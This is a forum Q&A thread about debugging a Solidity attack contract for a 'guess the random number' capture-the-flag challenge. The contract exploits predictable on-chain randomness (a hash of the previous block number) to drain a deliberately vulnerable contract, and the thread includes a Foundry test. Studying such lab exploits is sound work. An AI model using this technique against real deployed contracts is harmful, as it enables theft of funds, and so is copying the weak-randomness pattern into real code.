# Attack function reverting.. Why?

Tags: ethereum, solidity, revert

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

contract GuessTheRandomNumberChallenge {
    bytes32 answer;

    constructor() payable {
        require(msg.value == 1 ether);
        answer = keccak256(abi.encodePacked(block.number - 1));
    }

    function isComplete() public view returns (bool) {
        return address(this).balance == 0;
    }

    function guess(bytes32 n) public payable {
        require(msg.value == 1 ether);

        if (n == answer) {
            payable(msg.sender).transfer(2 ether);
        } else revert("answer is wrong");
    }
}

contract Attack {
    address private addr;

    constructor(address _addr) payable {
        require(msg.value == 2 ether, " 2 ether requires ");
        addr = _addr;
    }

    GuessTheRandomNumberChallenge victim = GuessTheRandomNumberChallenge(addr);

    bytes32 x = keccak256(abi.encodePacked(block.number - 1));

    function attackTo() public payable {
        victim.guess{value: 1 ether}(x);
    }
}
```

I am trying to get guess() function by using Attack contract.
but **"victim.guess{value: 1 ether}(x); "** line is always reverting.

here is the return :

```
transact to Attack.attackTo errored: VM error: revert.

revert
    The transaction has been reverted to the initial state.
Note: The called function should be payable if you send value and the value you send should be less than your current balance.
Debug the transaction to get more information.
```

Help please

I was thinking its because of {value: 1 ether }

Here is my Foundry test. test creates contracts but when it reaches to  victim.guess{value: 1 ether}(x); line it reverst immediately. I  think it's not about sending ethers. There is something else

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import "forge-std/Test.sol";
import {GuessTheRandomNumberChallenge, Attack} from "../src/GuessTheNumber.sol";

contract TestGuessNumber is Test {
    GuessTheRandomNumberChallenge public guessTheNumber;
    Attack public attack;

    function setUp() public {
        guessTheNumber = new GuessTheRandomNumberChallenge{value: 1 ether}();

        attack = new Attack{value: 2 ether}(address(guessTheNumber));
    }

    function testPwn() public {
        attack.attackTo();
    }
}
```

Comment: Do you have 1 ether in your smart contract?

Comment: Yes. I'm adding ether.

Comment: Change `require(msg.value == 1 ether)` to `require(msg.value == 1 ether, "1 ether")`. Try again, and see if you get a revert reason now

Answer (score 1, accepted):

The issue is you are creating the victim variable while the address is uninitialized.

```
address private addr;

constructor(address _addr) payable {
    require(msg.value == 2 ether, " 2 ether requires ");
    addr = _addr;
}

GuessTheRandomNumberChallenge victim = GuessTheRandomNumberChallenge(addr);
```

The victim address is going to be a 0 address, you have to move the initialization into the constructor, like this:

```
address private addr;
GuessTheRandomNumberChallenge victim;

constructor(address _addr) payable {
    require(msg.value == 2 ether, " 2 ether requires ");
    addr = _addr;
    victim = GuessTheRandomNumberChallenge(addr);
}
```

Also you also have to include a receive or fallback function in your attack contract so it will be able to receive the ethers, like so:

```
receive() external payable {

}
```

Comment: Thank you @6b86b273ff .... I did. It's still the same.

Answer (score 0):

THANK YOU. My problem has been solved. For other guys who wanted to learn what has happened, I'm adding edited contract. Newly added lines has been commented.

```
// SPDX-License-Identifier: MIT
```

pragma solidity ^0.8.20;

contract GuessTheRandomNumberChallenge {
bytes32 answer;

```
constructor() payable {
    require(msg.value == 1 ether);
    answer = keccak256(abi.encodePacked(block.number - 1));
}

function isComplete() public view returns (bool) {
    return address(this).balance == 0;
}

function guess(bytes32 n) public payable {
    require(msg.value == 1 ether, " niyeee");

    if (n == answer) {
        payable(msg.sender).transfer(2 ether);
    } else revert("answer is wrong");
}
```

}

contract Attack {
address private addr;

```
constructor(address _addr) payable {
    require(msg.value == 2 ether, " 2 ether requires ");
    addr = _addr;
    victim = GuessTheRandomNumberChallenge(addr); // initialization added
}

GuessTheRandomNumberChallenge victim;

bytes32 x = keccak256(abi.encodePacked(block.number - 1));

function attackTo() public payable {
    victim.guess{value: 1 ether}(x);
}

receive() external payable {}  // receive added
```

}